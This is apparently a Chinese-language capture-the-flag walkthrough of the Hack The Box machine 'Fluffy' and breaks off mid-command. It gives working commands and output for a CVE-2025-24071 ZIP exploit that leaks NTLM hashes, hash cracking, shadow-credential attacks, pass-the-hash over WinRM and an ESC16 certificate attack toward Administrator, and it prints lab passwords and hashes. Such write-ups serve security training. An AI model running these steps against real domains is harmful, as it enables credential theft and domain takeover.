信息收集 ┌──(root㉿kali)-[/srv/ftp/incoming] └─# nmap -sCV -p- --min-rate 10000 10.10.11.69 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-26 08:56 EDT Nmap scan report for 10.10.11.69 Host is up (0.65s latency). Not shown: 65516 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-07-26 19:33:46Z) 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name) |_ssl-date: 2025-07-26T19:35:26+00:00; +6h36m16s from scanner time. | ssl-cert: Subject: commonName=DC01.fluffy.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb | Not valid before: 2025-04-17T16:04:17 |_Not valid after: 2026-04-17T16:04:17 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=DC01.fluffy.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb | Not valid before: 2025-04-17T16:04:17 |_Not valid after: 2026-04-17T16:04:17 |_ssl-date: 2025-07-26T19:35:25+00:00; +6h36m16s from scanner time. 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name) |_ssl-date: 2025-07-26T19:35:26+00:00; +6h36m16s from scanner time. | ssl-cert: Subject: commonName=DC01.fluffy.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb | Not valid before: 2025-04-17T16:04:17 |_Not valid after: 2026-04-17T16:04:17 3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=DC01.fluffy.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb | Not valid before: 2025-04-17T16:04:17 |_Not valid after: 2026-04-17T16:04:17 |_ssl-date: 2025-07-26T19:35:25+00:00; +6h36m16s from scanner time. 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 9389/tcp open mc-nmf .NET Message Framing 49667/tcp open msrpc Microsoft Windows RPC 49689/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49690/tcp open msrpc Microsoft Windows RPC 49691/tcp open msrpc Microsoft Windows RPC 49707/tcp open msrpc Microsoft Windows RPC 49713/tcp open msrpc Microsoft Windows RPC 49742/tcp open msrpc Microsoft Windows RPC Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-time: | date: 2025-07-26T19:34:49 |_ start_date: N/A | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required |_clock-skew: mean: 6h36m15s, deviation: 0s, median: 6h36m15s Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 155.50 seconds
探测一下smb共享
┌──(root㉿kali)-[/srv/ftp/incoming] └─# crackmapexec smb 10.10.11.69 -u 'j.fleischman' -p 'J0elTHEM4n1990!' --shares SMB 10.10.11.69 445 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:False) SMB 10.10.11.69 445 DC01 [+] fluffy.htb\j.fleischman:J0elTHEM4n1990! SMB 10.10.11.69 445 DC01 [+] Enumerated shares SMB 10.10.11.69 445 DC01 Share Permissions Remark SMB 10.10.11.69 445 DC01 ----- ----------- ------ SMB 10.10.11.69 445 DC01 ADMIN$ Remote Admin SMB 10.10.11.69 445 DC01 C$ Default share SMB 10.10.11.69 445 DC01 IPC$ READ Remote IPC SMB 10.10.11.69 445 DC01 IT READ,WRITE SMB 10.10.11.69 445 DC01 NETLOGON READ Logon server share SMB 10.10.11.69 445 DC01 SYSVOL READ Logon server share
┌──(root㉿kali)-[/myift/bachang/htb/8/2fluffy] └─# smbclient //10.10.11.69/IT -U "j.fleischman" Password for [WORKGROUP\j.fleischman]: Try "help" to get a list of possible commands. smb: \> ls . D 0 Mon May 19 10:27:02 2025 .. D 0 Mon May 19 10:27:02 2025 Everything-1.4.1.1026.x64 D 0 Fri Apr 18 11:08:44 2025 Everything-1.4.1.1026.x64.zip A 1827464 Fri Apr 18 11:04:05 2025 KeePass-2.58 D 0 Fri Apr 18 11:08:38 2025 KeePass-2.58.zip A 3225346 Fri Apr 18 11:03:17 2025 Upgrade_Notice.pdf A 169963 Sat May 17 10:31:07 2025 cd 5842943 blocks of size 4096. 2047262 blocks available smb: \> get Upgrade_Notice.pdf getting file \Upgrade_Notice.pdf of size 169963 as Upgrade_Notice.pdf (39.4 KiloBytes/sec) (average 39.4 KiloBytes/sec) smb: \> exit
他们在修补漏洞我们看一下都有什么可利用
cve-2025-24071是通过 RAR/ZIP 提取和 .library-ms 文件泄露 NTLM 哈希值 我们可以利用上传zip获得NTLM 哈希值
┌──(root㉿kali)-[/myift/…/htb/8/2fluffy/CVE-2025-24071-main] └─# python3 exploit.py -i 10.10.14.41 -f exploit ______ ____ ____ _______ ___ ___ ___ _____ ___ _ _ ___ ______ __ / |\ \ / / | ____| |__ \ / _ \ |__ \ | ____| |__ \ | || | / _ \ |____ | /_ | | ,----' \ \/ / | |__ ______ ) | | | | | ) | | |__ ______ ) | | || |_ | | | | / / | | | | \ / | __| |______/ / | | | | / / |___ \ |______/ / |__ _| | | | | / / | | | `----. \ / | |____ / /_ | |_| | / /_ ___) | / /_ | | | |_| | / / | | \______| \__/ |_______| |____| \___/ |____| |____/ |____| |_| \___/ /_/ |_| Windows File Explorer Spoofing Vulnerability (CVE-2025-24071) by ThemeHackers Creating exploit with filename: exploit.library-ms Target IP: 10.10.14.41 Generating library file... ✓ Library file created successfully Creating ZIP archive... ✓ ZIP file created successfully Cleaning up temporary files... ✓ Cleanup completed Process completed successfully! Output file: exploit.zip Run this file on the victim machine and you will see the effects of the vulnerability such as using ftp smb to send files etc. ┌──(root㉿kali)-[/myift/…/htb/8/2fluffy/CVE-2025-24071-main] └─# ls exploit.py exploit.zip LICENSE README.md requirements.txt
上传zip
┌──(root㉿kali)-[/myift/…/htb/8/2fluffy/CVE-2025-24071-main] └─# smbclient //10.10.11.69/IT -U j.fleischman%J0elTHEM4n1990! -c "put exploit.zip" putting file exploit.zip as \exploit.zip (0.5 kb/s) (average 0.5 kb/s)
看一下监听结果
┌──(root㉿kali)-[/myift/…/htb/8/2fluffy/CVE-2025-24071-main] └─# impacket-smbserver share ./share -smb2support Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies [*] Config file parsed [*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0 [*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0 [*] Config file parsed [*] Config file parsed [*] Incoming connection (10.10.11.69,56480) [*] AUTHENTICATE_MESSAGE (FLUFFY\p.agila,DC01) [*] User DC01\p.agila authenticated successfully [*] p.agila::FLUFFY:aaaaaaaaaaaaaaaa:a7120225a7fb4ee9ee78350d0efe3ae0:01010000000000008035c548d3fedb01ce761f9e03b5545100000000010010006500410055006f004e00480043007100030010006500410055006f004e004800430071000200100050004f0043005600720068004f004a000400100050004f0043005600720068004f004a00070008008035c548d3fedb010600040002000000080030003000000000000000010000000020000054e6a940f446806547868bec8520a22e30044cd616e1285d3ed58bb14b4ac0e30a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00340031000000000000000000 [*] Closing down connection (10.10.11.69,56480) [*] Remaining connections [] [*] Incoming connection (10.10.11.69,56481) [*] AUTHENTICATE_MESSAGE (FLUFFY\p.agila,DC01) [*] User DC01\p.agila authenticated successfully [*] p.agila::FLUFFY:aaaaaaaaaaaaaaaa:80a8687700e04829ba984d1db8650078:010100000000000000cc5d49d3fedb0168aa22537e749fa300000000010010006500410055006f004e00480043007100030010006500410055006f004e004800430071000200100050004f0043005600720068004f004a000400100050004f0043005600720068004f004a000700080000cc5d49d3fedb010600040002000000080030003000000000000000010000000020000054e6a940f446806547868bec8520a22e30044cd616e1285d3ed58bb14b4ac0e30a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00340031000000000000000000 [*] Closing down connection (10.10.11.69,56481) [*] Remaining connections [] [*] Incoming connection (10.10.11.69,56482) [*] AUTHENTICATE_MESSAGE (FLUFFY\p.agila,DC01) [*] User DC01\p.agila authenticated successfully [*] p.agila::FLUFFY:aaaaaaaaaaaaaaaa:fc9eb9eb14397ee2dcf26130cd255fa0:01010000000000008062f649d3fedb0185c03b96bcce126b00000000010010006500410055006f004e00480043007100030010006500410055006f004e004800430071000200100050004f0043005600720068004f004a000400100050004f0043005600720068004f004a00070008008062f649d3fedb010600040002000000080030003000000000000000010000000020000054e6a940f446806547868bec8520a22e30044cd616e1285d3ed58bb14b4ac0e30a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00340031000000000000000000 [*] Closing down connection (10.10.11.69,56482) [*] Remaining connections [] [*] Incoming connection (10.10.11.69,56483) [*] AUTHENTICATE_MESSAGE (FLUFFY\p.agila,DC01) [*] User DC01\p.agila authenticated successfully [*] p.agila::FLUFFY:aaaaaaaaaaaaaaaa:1521ba3de8c9bcf81945b1ddd6deea59:010100000000000000f98e4ad3fedb01f76458b180d1935000000000010010006500410055006f004e00480043007100030010006500410055006f004e004800430071000200100050004f0043005600720068004f004a000400100050004f0043005600720068004f004a000700080000f98e4ad3fedb010600040002000000080030003000000000000000010000000020000054e6a940f446806547868bec8520a22e30044cd616e1285d3ed58bb14b4ac0e30a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00340031000000000000000000 [*] Closing down connection (10.10.11.69,56483) [*] Remaining connections [] [*] Incoming connection (10.10.11.69,56484) [*] AUTHENTICATE_MESSAGE (FLUFFY\p.agila,DC01) [*] User DC01\p.agila authenticated successfully [*] p.agila::FLUFFY:aaaaaaaaaaaaaaaa:4ec9d35651b43f15a855247dea1bfc42:0101000000000000808f274bd3fedb01e00f7352c66005fe00000000010010006500410055006f004e00480043007100030010006500410055006f004e004800430071000200100050004f0043005600720068004f004a000400100050004f0043005600720068004f004a0007000800808f274bd3fedb010600040002000000080030003000000000000000010000000020000054e6a940f446806547868bec8520a22e30044cd616e1285d3ed58bb14b4ac0e30a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00340031000000000000000000 [*] Closing down connection (10.10.11.69,56484) [*] Remaining connections []
将得到的hash爆破一下
┌──(root㉿kali)-[/myift/…/htb/8/2fluffy/CVE-2025-24071-main] └─# hashcat --identify hash The following hash-mode match the structure of your input hash: # | Name | Category ======+============================================================+====================================== 5600 | NetNTLMv2 | Network Protocol ┌──(root㉿kali)-[/myift/…/htb/8/2fluffy/CVE-2025-24071-main] └─# cat hash p.agila::FLUFFY:aaaaaaaaaaaaaaaa:4ec9d35651b43f15a855247dea1bfc42:0101000000000000808f274bd3fedb01e00f7352c66005fe00000000010010006500410055006f004e00480043007100030010006500410055006f004e004800430071000200100050004f0043005600720068004f004a000400100050004f0043005600720068004f004a0007000800808f274bd3fedb010600040002000000080030003000000000000000010000000020000054e6a940f446806547868bec8520a22e30044cd616e1285d3ed58bb14b4ac0e30a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00340031000000000000000000 ┌──(root㉿kali)-[/myift/…/htb/8/2fluffy/CVE-2025-24071-main] └─# hashcat -m 5600 -a 0 hash /usr/share/wordlists/rockyou.txt hashcat (v6.2.6) starting OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, LLVM 17.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project] ============================================================================================================================================ * Device #1: cpu-sandybridge-11th Gen Intel(R) Core(TM) i5-1135G7 @ 2.40GHz, 2212/4489 MB (1024 MB allocatable), 4MCU Minimum password length supported by kernel: 0 Maximum password length supported by kernel: 256 Hashes: 1 digests; 1 unique digests, 1 unique salts Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates Rules: 1 Optimizers applied: * Zero-Byte * Not-Iterated * Single-Hash * Single-Salt ATTENTION! Pure (unoptimized) backend kernels selected. Pure kernels can crack longer passwords, but drastically reduce performance. If you want to switch to optimized kernels, append -O to your commandline. See the above message to find out about the exact limits. Watchdog: Temperature abort trigger set to 90c Host memory required for this attack: 1 MB Dictionary cache hit: * Filename..: /usr/share/wordlists/rockyou.txt * Passwords.: 14344385 * Bytes.....: 139921507 * Keyspace..: 14344385 Cracking performance lower than expected? * Append -O to the commandline. This lowers the maximum supported password/salt length (usually down to 32). * Append -w 3 to the commandline. This can cause your screen to lag. * Append -S to the commandline. This has a drastic speed impact but can be better for specific attacks. Typical scenarios are a small wordlist but a large ruleset. * Update your backend API runtime / driver the right way: https://hashcat.net/faq/wrongdriver * Create more work items to make use of your parallelization power: https://hashcat.net/faq/morework P.AGILA::FLUFFY:aaaaaaaaaaaaaaaa:4ec9d35651b43f15a855247dea1bfc42:0101000000000000808f274bd3fedb01e00f7352c66005fe00000000010010006500410055006f004e00480043007100030010006500410055006f004e004800430071000200100050004f0043005600720068004f004a000400100050004f0043005600720068004f004a0007000800808f274bd3fedb010600040002000000080030003000000000000000010000000020000054e6a940f446806547868bec8520a22e30044cd616e1285d3ed58bb14b4ac0e30a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00340031000000000000000000:prometheusx-303 Session..........: hashcat Status...........: Cracked Hash.Mode........: 5600 (NetNTLMv2) Hash.Target......: P.AGILA::FLUFFY:aaaaaaaaaaaaaaaa:4ec9d35651b43f15a8...000000 Time.Started.....: Sun Jul 27 06:34:58 2025 (7 secs) Time.Estimated...: Sun Jul 27 06:35:05 2025 (0 secs) Kernel.Feature...: Pure Kernel Guess.Base.......: File (/usr/share/wordlists/rockyou.txt) Guess.Queue......: 1/1 (100.00%) Speed.#1.........: 789.9 kH/s (1.58ms) @ Accel:512 Loops:1 Thr:1 Vec:8 Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new) Progress.........: 4517888/14344385 (31.50%) Rejected.........: 0/4517888 (0.00%) Restore.Point....: 4515840/14344385 (31.48%) Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1 Candidate.Engine.: Device Generator Candidates.#1....: proretriever -> progree Hardware.Mon.#1..: Util: 68% Started: Sun Jul 27 06:34:56 2025 Stopped: Sun Jul 27 06:35:06 2025
得到了P.AGILA的密码为prometheusx-303
我们看一下P.AGILA的权限
影子证书攻击 他是一个service Account manager组。这个用户可以将自己加入Service Account用户组,然后对svc用户拥有GenericWrite权限,这个权限结合CA证书服务,可以导致影子证书攻击,也就是说,我们完全可以窃取他们的hash,进一步测试
┌──(root㉿kali)-[/myift/…/htb/8/2fluffy/CVE-2025-24071-main] └─# bloodyAD -d fluffy.htb -u p.agila -p 'prometheusx-303' --dc-ip 10.10.11.69 add groupMember 'SERVICE ACCOUNTS' p.agila [+] p.agila added to SERVICE ACCOUNTS ┌──(root㉿kali)-[/myift/…/htb/8/2fluffy/CVE-2025-24071-main] └─# certipy-ad find -u p.agila -p prometheusx-303 -dc-ip 10.10.11.69 Certipy v4.8.2 - by Oliver Lyak (ly4k) [*] Finding certificate templates [*] Found 33 certificate templates [*] Finding certificate authorities [*] Found 1 certificate authority [*] Found 11 enabled certificate templates [*] Trying to get CA configuration for 'fluffy-DC01-CA' via CSRA [!] Got error while trying to get CA configuration for 'fluffy-DC01-CA' via CSRA: Could not connect: timed out [*] Trying to get CA configuration for 'fluffy-DC01-CA' via RRP [!] Failed to connect to remote registry. Service should be starting now. Trying again... [*] Got CA configuration for 'fluffy-DC01-CA' [*] Saved BloodHound data to '20250727134014_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k [*] Saved text output to '20250727134014_Certipy.txt' [*] Saved JSON output to '20250727134014_Certipy.json'
看一下我们对目标账户的属性修改权限
┌──(root㉿kali)-[/myift/…/htb/8/2fluffy/CVE-2025-24071-main] └─# bloodyAD -d fluffy.htb -u p.agila -p 'prometheusx-303' --dc-ip 10.10.11.69 get writable --detail distinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=fluffy,DC=htb url: WRITE wWWHomePage: WRITE distinguishedName: CN=certificate authority service,CN=Users,DC=fluffy,DC=htb shadowFlag: WRITE shadowExpire: WRITE shadowInactive: WRITE shadowWarning: WRITE shadowMax: WRITE shadowMin: WRITE shadowLastChange: WRITE loginShell: WRITE unixHomeDirectory: WRITE gecos: WRITE gidNumber: WRITE uidNumber: WRITE msSFU30NisDomain: WRITE msSFU30Name: WRITE labeledURI: WRITE userPKCS12: WRITE preferredLanguage: WRITE thumbnailLogo: WRITE thumbnailPhoto: WRITE ````
攻击者可以将自己的公钥信息写入目标用户的 msDS-KeyCredentialLink 属性中 。一旦写入成功,域控制器就会信任这个新的公钥。攻击者就可以使用与这个公钥对应的私钥 来生成一个证书或 Kerberos 票据,然后冒充目标用户进行身份验证。
由于攻击者可以为域中的任何用户伪造一个有效的公钥凭据,如果目标用户是域管理员,攻击者就能以域管理员身份登录,实现权限升级。
执行影子证书攻击,窃取winrm_svc用户的hash
┌──(root㉿kali)-[/myift/…/htb/8/2fluffy/CVE-2025-24071-main] └─# certipy-ad shadow auto -debug -u 'p.agila@fluffy.htb' -p 'prometheusx-303' -account 'winrm_svc' -target dc01.fluffy.htb -dc-ip 10.10.11.69 Certipy v4.8.2 - by Oliver Lyak (ly4k) [+] Trying to resolve 'dc01.fluffy.htb' at '10.10.11.69' [+] Authenticating to LDAP server [+] Bound to ldaps://10.10.11.69:636 - ssl [+] Default path: DC=fluffy,DC=htb [+] Configuration path: CN=Configuration,DC=fluffy,DC=htb [*] Targeting user 'winrm_svc' [*] Generating certificate [*] Certificate generated [*] Generating Key Credential [*] Key Credential generated with DeviceID '5d3553d2-81b4-8f70-e7ad-bc195c5a218d' <KeyCredential structure at 0x7f0b38d54050> | Owner: CN=winrm service,CN=Users,DC=fluffy,DC=htb | Version: 0x200 | KeyID: Oxq4/4W2f43XCTsLj1HiG8ca7dKNJGE7JqBXquQfqN4= | KeyHash: 8a412cd101147142e8adc9245b594b8a059bd3a65c9df02765f9536432dad160 | RawKeyMaterial: <dsinternals.common.cryptography.RSAKeyMaterial.RSAKeyMaterial object at 0x7f0b3907bd90> | | Exponent (E): 65537 | | Modulus (N): 0xcf126d263713ac29300f96235d6e90062a24b425deaf92ab717b9052859dc9e985ab98bacdedc98386c85a64eafa70a6f820cd2389c3fdf83f788f6ad30262c7e733f504f573c2f4c38694307b00581cf10dffc4150895ad9ebe63209c0d04443f2f3049579d8af853c29630eae2f5774d7014fc2e3b971143ce61b3b6202143bc0521bbb5a4431c67d22ff444d6ef98eed6be73c01456b076863d1a1de92edeb50bff4660fa3e5b8e0fc40b3fd19809648b010589e2733da0949de1c0a0c9723c7914b2e52ca6235452e226c1e98f69b47db6cd7e2da0e2f23d62cac8f4a0a1effc6833cdd34fb7f9ccfd481c87a03eedcec5d271e32b9de1674ac081e321c1 | | Prime1 (P): 0x0 | | Prime2 (Q): 0x0 | Usage: KeyUsage.NGC | LegacyUsage: None | Source: KeySource.AD | DeviceId: 5d3553d2-81b4-8f70-e7ad-bc195c5a218d | CustomKeyInfo: <CustomKeyInformation at 0x7f0b38d03e80> | | Version: 1 | | Flags: KeyFlags.NONE | | VolumeType: None | | SupportsNotification: None | | FekKeyVersion: None | | Strength: None | | Reserved: None | | EncodedExtendedCKI: None | LastLogonTime (UTC): 2025-07-27 18:09:41.322062 | CreationTime (UTC): 2025-07-27 18:09:41.322062 [+] Key Credential: B:828:000200002000013b1ab8ff85b67f8dd7093b0b8f51e21bc71aedd28d24613b26a057aae41fa8de2000028a412cd101147142e8adc9245b594b8a059bd3a65c9df02765f9536432dad1601b0103525341310008000003000000000100000000000000000000010001cf126d263713ac29300f96235d6e90062a24b425deaf92ab717b9052859dc9e985ab98bacdedc98386c85a64eafa70a6f820cd2389c3fdf83f788f6ad30262c7e733f504f573c2f4c38694307b00581cf10dffc4150895ad9ebe63209c0d04443f2f3049579d8af853c29630eae2f5774d7014fc2e3b971143ce61b3b6202143bc0521bbb5a4431c67d22ff444d6ef98eed6be73c01456b076863d1a1de92edeb50bff4660fa3e5b8e0fc40b3fd19809648b010589e2733da0949de1c0a0c9723c7914b2e52ca6235452e226c1e98f69b47db6cd7e2da0e2f23d62cac8f4a0a1effc6833cdd34fb7f9ccfd481c87a03eedcec5d271e32b9de1674ac081e321c10100040101000500100006d253355db481708fe7adbc195c5a218d0200070100080008f9848a9f21ffdb01080009f9848a9f21ffdb01:CN=winrm service,CN=Users,DC=fluffy,DC=htb [*] Adding Key Credential with device ID '5d3553d2-81b4-8f70-e7ad-bc195c5a218d' to the Key Credentials for 'winrm_svc' [*] Successfully added Key Credential with device ID '5d3553d2-81b4-8f70-e7ad-bc195c5a218d' to the Key Credentials for 'winrm_svc' [*] Authenticating as 'winrm_svc' with the certificate [*] Using principal: winrm_svc@fluffy.htb [*] Trying to get TGT... [*] Got TGT [*] Saved credential cache to 'winrm_svc.ccache' [*] Trying to retrieve NT hash for 'winrm_svc' [*] Restoring the old Key Credentials for 'winrm_svc' [*] Successfully restored the old Key Credentials for 'winrm_svc' [*] NT hash for 'winrm_svc': 33bd09dcd697600edf6b3a7af4875767
成功获取了 WINRM_SVC 用户的 NT 哈希
┌──(root㉿kali)-[/myift/…/htb/8/2fluffy/CVE-2025-24071-main] └─# evil-winrm -i 10.10.11.69 -u 'WINRM_SVC' -H '33bd09dcd697600edf6b3a7af4875767' Evil-WinRM shell v3.7 Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\winrm_svc\Documents> cd .. *Evil-WinRM* PS C:\Users\winrm_svc> cd desktop *Evil-WinRM* PS C:\Users\winrm_svc\desktop> type user.txt cc89*****************
成功拿到userflag
我们再拿一下ca_svc用户的hash
┌──(root㉿kali)-[/myift/…/htb/8/2fluffy/CVE-2025-24071-main] └─# ntpdate 10.10.11.69 2025-07-27 16:15:49.117859 (-0400) +3381.164582 +/- 0.336972 10.10.11.69 s1 no-leap CLOCK: time stepped by 3381.164582 ┌──(root㉿kali)-[/myift/…/htb/8/2fluffy/CVE-2025-24071-main] └─# certipy-ad shadow auto -debug -u 'p.agila@fluffy.htb' -p 'prometheusx-303' -account 'ca_svc' -target dc01.fluffy.htb -dc-ip 10.10.11.69 Certipy v4.8.2 - by Oliver Lyak (ly4k) [+] Trying to resolve 'dc01.fluffy.htb' at '10.10.11.69' [+] Authenticating to LDAP server [+] Bound to ldaps://10.10.11.69:636 - ssl [+] Default path: DC=fluffy,DC=htb [+] Configuration path: CN=Configuration,DC=fluffy,DC=htb [*] Targeting user 'ca_svc' [*] Generating certificate [*] Certificate generated [*] Generating Key Credential [*] Key Credential generated with DeviceID '0e40c569-4e25-5ca5-c416-b04df7c3dd51' <KeyCredential structure at 0x7f66a40bfc50> | Owner: CN=certificate authority service,CN=Users,DC=fluffy,DC=htb | Version: 0x200 | KeyID: Ohnn3EPYflTVG80nuKy52xET0rM7YCqLDT+uamRAOEk= | KeyHash: 2910c4f1a2f7374ae1d67e14e8f51e69a2959c80331fc0aafe4da485ebc2d3a9 | RawKeyMaterial: <dsinternals.common.cryptography.RSAKeyMaterial.RSAKeyMaterial object at 0x7f66a40bf9d0> | | Exponent (E): 65537 | | Modulus (N): 0xe4956bc832b77c9484d8603b4001ca7147376c1a6d0a2165d594426c6417a28a699b78d2a59ee4f7db2b819355ae393bc4878bc3e6a65ba048a3681353774f70c6b3b1d98736ba0e6c7fbeb92799b05bac509f492ed3919299e9debfab73fb9d93226fc3d482139d8e2d8e1eb36f1a8f694e5663ddbddd3afb836eda776a39b221feace0215c18ca49de8761b08383680bc34a6de86d6d5767bb7ca20d12886fe231a06909931422e2f68808fc7a84eb1ebccb509eeec07f212c17b3e2687625edcc35f47c39d0b9d9f0bec40b33218f598389c83c5cfa3211f4a6db8fa77848b75c0cae54bab7e6d68483495c1a716652a335973eae8eec54db8aa47b63ec6b | | Prime1 (P): 0x0 | | Prime2 (Q): 0x0 | Usage: KeyUsage.NGC | LegacyUsage: None | Source: KeySource.AD | DeviceId: 0e40c569-4e25-5ca5-c416-b04df7c3dd51 | CustomKeyInfo: <CustomKeyInformation at 0x7f66a3d5fc50> | | Version: 1 | | Flags: KeyFlags.NONE | | VolumeType: None | | SupportsNotification: None | | FekKeyVersion: None | | Strength: None | | Reserved: None | | EncodedExtendedCKI: None | LastLogonTime (UTC): 2025-07-27 20:17:15.073256 | CreationTime (UTC): 2025-07-27 20:17:15.073256 [+] Key Credential: B:828:000200002000013a19e7dc43d87e54d51bcd27b8acb9db1113d2b33b602a8b0d3fae6a644038492000022910c4f1a2f7374ae1d67e14e8f51e69a2959c80331fc0aafe4da485ebc2d3a91b0103525341310008000003000000000100000000000000000000010001e4956bc832b77c9484d8603b4001ca7147376c1a6d0a2165d594426c6417a28a699b78d2a59ee4f7db2b819355ae393bc4878bc3e6a65ba048a3681353774f70c6b3b1d98736ba0e6c7fbeb92799b05bac509f492ed3919299e9debfab73fb9d93226fc3d482139d8e2d8e1eb36f1a8f694e5663ddbddd3afb836eda776a39b221feace0215c18ca49de8761b08383680bc34a6de86d6d5767bb7ca20d12886fe231a06909931422e2f68808fc7a84eb1ebccb509eeec07f212c17b3e2687625edcc35f47c39d0b9d9f0bec40b33218f598389c83c5cfa3211f4a6db8fa77848b75c0cae54bab7e6d68483495c1a716652a335973eae8eec54db8aa47b63ec6b010004010100050010000669c5400e254ea55cc416b04df7c3dd5102000701000800081145887133ffdb010800091145887133ffdb01:CN=certificate authority service,CN=Users,DC=fluffy,DC=htb [*] Adding Key Credential with device ID '0e40c569-4e25-5ca5-c416-b04df7c3dd51' to the Key Credentials for 'ca_svc' [*] Successfully added Key Credential with device ID '0e40c569-4e25-5ca5-c416-b04df7c3dd51' to the Key Credentials for 'ca_svc' [*] Authenticating as 'ca_svc' with the certificate [*] Using principal: ca_svc@fluffy.htb [*] Trying to get TGT... [*] Got TGT [*] Saved credential cache to 'ca_svc.ccache' [*] Trying to retrieve NT hash for 'ca_svc' [*] Restoring the old Key Credentials for 'ca_svc' [*] Successfully restored the old Key Credentials for 'ca_svc' [*] NT hash for 'ca_svc': ca0f4f9e9eb8a092addf53bb03fc98c8
CA 证书模板漏洞攻击 - ESC16 ┌──(root㉿kali)-[/myift/…/htb/8/2fluffy/CVE-2025-24071-main] └─#certipy-ad find -username ca_svc -hashes :ca0f4f9e9eb8a092addf53bb03fc98c8 -dc-ip 10.10.11.69 -vulnerable Certipy v4.8.2 - by Oliver Lyak (ly4k) [*] Finding certificate templates [*] Found 33 certificate templates [*] Finding certificate authorities [*] Found 1 certificate authority [*] Found 11 enabled certificate templates [*] Trying to get CA configuration for 'fluffy-DC01-CA' via CSRA [!] Got error while trying to get CA configuration for 'fluffy-DC01-CA' via CSRA: Could not connect: timed out [*] Trying to get CA configuration for 'fluffy-DC01-CA' via RRP [!] Failed to connect to remote registry. Service should be starting now. Trying again... [*] Got CA configuration for 'fluffy-DC01-CA' [*] Saved BloodHound data to '20250727150414_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k [*] Saved text output to '20250727150414_Certipy.txt' [*] Saved JSON output to '20250727150414_Certipy.json'
CA 名称:fluffy-DC01-CA
可将zip导入bloodhound观察进攻线路
以 ca_svc 用户的身份和哈希,向 fluffy-DC01-CA 请求一个基于 User 模板的证书。获得一个冒充 Administrator 用户的数字证书和私钥。
使用刚刚获得的 administrator.pfx 证书,尝试以 administrator 用户的身份对 fluffy.htb 域进行身份验证,获得hash
┌──(root㉿kali)-[/myift/…/htb/8/2fluffy/CVE-2025-24071-main] └─# export KRB5CCNAME=ca_svc.ccache //设置环境变量 KRB5CCNAME,指向 ca_svc 用户的 Kerberos 凭据缓存文件。 ┌──(root㉿kali)-[/myift/…/htb/8/2fluffy/CVE-2025-24071-main] └─# certipy-ad account -u 'ca_svc' -hashes ':ca0f4f9e9eb8a092addf53bb03fc98c8' -dc-ip 10.10.11.69 -upn 'administrator' -user 'ca_svc' update Certipy v4.8.2 - by Oliver Lyak (ly4k) [*] Updating user 'ca_svc': userPrincipalName : administrator [*] Successfully updated 'ca_svc' // 使用 ca_svc 的哈希,将 ca_svc 账户的 userPrincipalName (UPN) 属性修改为 administrator。 ┌──(root㉿kali)-[/myift/…/htb/8/2fluffy/CVE-2025-24071-main] └─# ntpdate 10.10.11.69 2025-07-28 08:48:45.139284 (-0400) +47.012763 +/- 0.096627 10.10.11.69 s1 no-leap CLOCK: time stepped by 47.012763 // 再次同步 Kali Linux 机器的时间与目标域控制器的时间。 ┌──(root㉿kali)-[/myift/…/htb/8/2fluffy/CVE-2025-24071-main] └─# certipy-ad req -u 'ca_svc' -hashes ':ca0f4f9e9eb8a092addf53bb03fc98c8' -dc-ip 10.10.11.69 -target 'DC01.fluffy.htb' -ca 'fluffy-DC01-CA' -template 'User' Certipy v4.8.2 - by Oliver Lyak (ly4k) [*] Requesting certificate via RPC [*] 